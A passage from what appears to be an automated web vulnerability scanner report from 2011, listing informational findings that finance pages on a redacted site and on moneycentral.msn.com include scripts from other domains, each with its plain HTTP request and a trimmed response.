</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.192. http://money.redacted/mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.193. http://money.redacted/personal-finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/personal-finance

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /personal-finance HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.194. http://money.redacted/retirement previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/retirement

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /retirement HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.195. http://money.redacted/saving-money/50-30-20-budget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/saving-money/50-30-20-budget.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /saving-money/50-30-20-budget.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4d2c950ddf854b40a5add97ca57f1813; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:06 GMT
Content-Length: 33106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.196. http://money.redacted/stock-broker previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/stock-broker

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /stock-broker HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.197. http://money.redacted/stock-broker-guided/are-investors-too-bullish-mirhaydari.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/stock-broker-guided/are-investors-too-bullish-mirhaydari.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /stock-broker-guided/are-investors-too-bullish-mirhaydari.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.198. http://money.redacted/stocks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/stocks

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /stocks HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.199. http://money.redacted/taxes previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/taxes

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /taxes HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.200. http://money.redacted/top-stocks/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/top-stocks/post.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /top-stocks/post.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.201. http://redacted/inc/Attributions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/inc/Attributions.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js

Request

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:48:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 26240
Content-Type: text/html
Expires: Sat, 29 Jan 2011 23:48:25 GMT
Set-Cookie: MUID=BBC5C4C59F664372B83E2469BBE8E1C0; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...
/redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.202. http://redacted/investor/StockRating/srsmain.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srsmain.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js

Request

GET /investor/StockRating/srsmain.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 29010
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:31 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...
/redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.203. http://redacted/investor/StockRating/srstopstocksresults.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srstopstocksresults.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js

Request

Response

23.204. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js

Request

GET /investor/charts/chartdl.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.205. http://redacted/investor/market/commodities.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/market/commodities.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js
https://secure.footprint.net/bstmsn/br/om/js/s_code.js

Request

GET /investor/market/commodities.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.206. http://redacted/investor/market/earncalendar/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/market/earncalendar/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js

Request

GET /investor/market/earncalendar/ HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 19872
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:26 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...
/redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.207. http://redacted/investor/market/exchangerates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/market/exchangerates.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js
https://secure.footprint.net/bstmsn/br/om/js/s_code.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.208. http://redacted/investor/market/treasuries.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/market/treasuries.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js
https://secure.footprint.net/bstmsn/br/om/js/s_code.js

Request

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:09 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.209. http://redacted/investor/market/usindex.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/market/usindex.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js
https://secure.footprint.net/bstmsn/br/om/js/s_code.js

Request

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:06 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.210. http://redacted/investor/market/worldmarkets.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/market/worldmarkets.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js
https://secure.footprint.net/bstmsn/br/om/js/s_code.js

Request

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
